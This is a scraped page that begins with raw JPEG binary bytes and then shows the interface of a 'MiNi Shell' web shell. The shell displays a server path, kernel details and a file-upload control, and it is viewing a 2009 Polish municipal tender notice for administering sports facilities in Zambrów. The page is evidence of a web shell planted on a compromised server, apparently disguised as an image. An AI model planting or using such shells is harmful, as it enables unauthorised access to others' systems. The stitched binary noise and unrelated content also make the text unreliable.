JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090518/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090518/76585-N-2009.html

<p class="kh_header"><b>Zambrów: ADMINISTROWANIE OBIEKTAMI SPORTOWYMI PRZY UL. WYSZYŃSKIEGO 8
 W ZAMBROWIE</b><br>
<b>Numer ogłoszenia: 76585 - 2009; data zamieszczenia: 18.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta Zambrów , ul. Fabryczna 3, 18-300 Zambrów, woj. podlaskie, tel. 0862712210 w. 16, faks 086 2712117.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zambrow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ADMINISTROWANIE OBIEKTAMI SPORTOWYMI PRZY UL. WYSZYŃSKIEGO 8
 W ZAMBROWIE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest administrowanie obiektami sportowymi przy                    ul. Wyszyńskiego 8 w Zambrowie położonymi na działce nr 2823 z wyłączeniem:
-	części ww. działki położonej od strony południowej poza ogrodzeniem stadionu, na której urządzone zostały tereny zielone,
-	części ww. działki położonej od strony północnej stanowiącej parking w granicach ogrodzenia parkingu,
-	części  ww. działki o pow. 2325 m2  stanowiącej ciąg komunikacyjny obiektu sportowego w związku z umową dzierżawy zawartą w dniu 14.07.2006r.,
-	lokalu użytkowego w budynku administracyjno-socjalnym składającego się z sali nr 1      o pow. 65,45 m2 oraz pokoju socjalnego o pow. 13,50 m2 z przeznaczeniem na działalność usługową,
-	lokalu użytkowego na parterze budynku administracyjno-socjalnego o pow. 60 m2           w związku z umową najmu z dnia 24.09.2007r.,
-	części ww. działki o pow. 70 m2 (teren przeznaczony do eksponowania towarów sprzedawanych w lokalu położonym na parterze budynku administracyjno-socjalnego)     w związku z umową dzierżawy z dnia 29.04.2009r..
2.	Załącznik graficzny obiektów sportowych stanowi załącznik Nr 4 do SIWZ.
3.	Zakres terenu będącego przedmiotem administrowania obejmuje teren na którym znajdują się następujące obiekty:
-	budynek administracyjno-socjalny,
-	wiata metalowa,
-	korty tenisowe,
-	płyta główna stadionu wraz z trybunami i infrastrukturą,
-	boisko boczne,
4.	Na obsługę szaletu miejskiego znajdującego się na parterze budynku administracyjno-socjalnego zawarta jest odrębna umowa. 
5.	Teren jest ogrodzony i wyposażony w infrastrukturę techniczną. 
6.	Zamawiający przekaże wykonawcy do bezpłatnego używania wyposażenie obiektu służące do jego utrzymania oraz prowadzenia imprez sportowych. Wykaz środków trwałych i wyposażenia obiektu wg stanu na dzień 30.06.2009r. podlegających przekazaniu do używania stanowić będzie załącznik do umowy. 
7.	Do obowiązków wykonawcy należeć będzie: 
1)	utrzymanie obiektów w należytym stanie technicznym w gotowości do organizowania imprez sportowych,  w tym prowadzenie dokumentacji technicznej i budowlanej;
2)	promocja obiektów sportowych i organizowanych imprez;
3)	eksploatacja obiektów, w tym ponoszenie wszelkich opłat formalno-prawnych związanych z utrzymaniem obiektu, a w szczególności:
-	opłat za wodę, ścieki, energię elektryczną, cieplną, opłat telefonicznych,
-	wywóz nieczystości i opłat za dzierżawę pojemników,
-	podatków i ubezpieczeń związanych z obiektem;
4)	zapewnienie czystości i bezpieczeństwa na obiekcie, w tym:
-	systematyczne koszenie i pielęgnacja płyty głównej boiska, stosowanie właściwego nawożenia podsiewów, oprysków, a w miarę potrzeby podlewania, 
-	właściwej pielęgnacji kortów tenisowych,
-	utrzymanie w należytym stanie boiska bocznego,
-	utrzymanie w należytym stanie budynku administracyjno-socjalnego;
5)	nieodpłatne udostępnianie urządzeń sportowych na organizację imprez organizowanych przez Burmistrza Miasta Zambrów, Radę Miasta Zambrów, zawodów sportowych o randze finałów na szczeblu miasta, powiatu, województwa, organizowanych przez Szkolne Związku Sportowe, wynikających z kalendarza imprez sportowych, po wcześniejszym uzgodnieniu z zarządzającym obiektem; 
6)	udostępnianie nieodpłatne obiektu dla imprez organizowanych przez Miasto Zambrów lub za zgodą Miasta Zambrów jako właściciela obiektu;
7)	pobieranie i przekazywanie do budżetu miasta opłat za korzystanie z kortów tenisowych i innego sprzętu w wysokości określonej przez Gminę Miasto Zambrów;
8)	wykonywanie na własny koszt konserwacji i bieżących remontów, których wartość     w każdym roku nie może być mniejsza niż 7 % wynagrodzenia brutto należnego wykonawcy w danym roku;
9)	organizowanie, w każdym roku realizacji zamówienia, masowych imprez sportowych;
10)	uzgadnianie z zamawiającym harmonogramu masowych imprez sportowych na następny rok realizacji zamówienia (harmonogram masowych imprez sportowych na rok 2009 wykonawca przedstawia w ofercie);
11)	uzgadnianie z zamawiającym planu konserwacji i bieżących remontów na każdy rok realizacji zamówienia (plan konserwacji i bieżących remontów na rok 2009 wykonawca przedstawia w ofercie);
12)	przedkładanie zamawiającemu sprawozdań z wykonania konserwacji i bieżących remontów oraz z przeprowadzonych masowych imprez sportowych do 30 stycznia następnego roku lub w ciągu 30 dni od rozwiązania lub wygaśnięcia umowy;
13)	prowadzenie obsługi finansowo-księgowej i sprawozdawczości..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 70.33.20.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiajacy nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	W postępowaniu mogą wziąć udział wykonawcy spełniający warunki określone                w niniejszej specyfikacji istotnych warunków zamówienia, którzy złożą wymagane oświadczenia i dokumenty. O udzielenie zamówienia ubiegać się mogą wykonawcy spełniający warunki określone w art. 22 ust.1 pkt.1-4 oraz nie podlegający wykluczeniu na podstawie art. 24 ust.1 i 2 ustawy z dnia 29.01.2004r Prawo zamówień publicznych ( Dz.U. z 2007r. Nr 223, poz.1655 z późn. zm.), tj: 
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia;
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

2.  Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w sposób
     spełnia/nie spełnia, na podstawie dokumentów złożonych wraz z ofertą przez wykonawcę..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1)	Wypełniony formularz ofertowy zgodnie ze wzorem stanowiącym załącznik Nr 1 do SIWZ;
2)	Oświadczenie o spełnianiu warunków art. 22 ust. 1 pkt 1 - 4 PZP stanowiącym załącznik Nr 2 do SIWZ;
3)	Aktualny odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia  do  ewidencji  działalności  gospodarczej,   wystawione   nie   wcześniej   niż 6 miesięcy przed upływem terminu składania ofert;
4)	Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie - spełnieniem warunku jest administrowanie lub zarządzanie nieruchomościami przez okres minimum 2 lata przy rocznym wynagrodzeniu co najmniej 100 tyś. złotych;
5)	Wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia,  wraz     z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonywania zamówienia, a także zakresu wykonywanych przez nich czynności;
6)	Dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia - wskazanie w ofercie osoby posiadającej uprawnienia   zawodowe   określone   w   art.  191   ustawy   z   dnia   21  sierpnia 1997r. o gospodarce nieruchomościami (tj. Dz. U. Nr 46 poz. 543 z późn. zm.) - należy przedłożyć potwierdzoną za zgodność z oryginałem kopię posiadanej licencji zawodowej w zakresie zarządzania nieruchomościami, a w przypadku, gdy osoba nie jest pracownikiem Wykonawcy -  również dokument  potwierdzający  istnienie zobowiązania w ww. zakresie  tej osoby wobec Wykonawcy;
7)	Polisa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> um.zambrow.bip-gov.info.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urzad Miasta Zambrów ul.Fabryczna 3 pokój ne 222.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.06.2009 godzina 10:00, miejsce: 18-300 Zambrów ul.Fabryczna 3, pok.nr 225 IIpietro.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com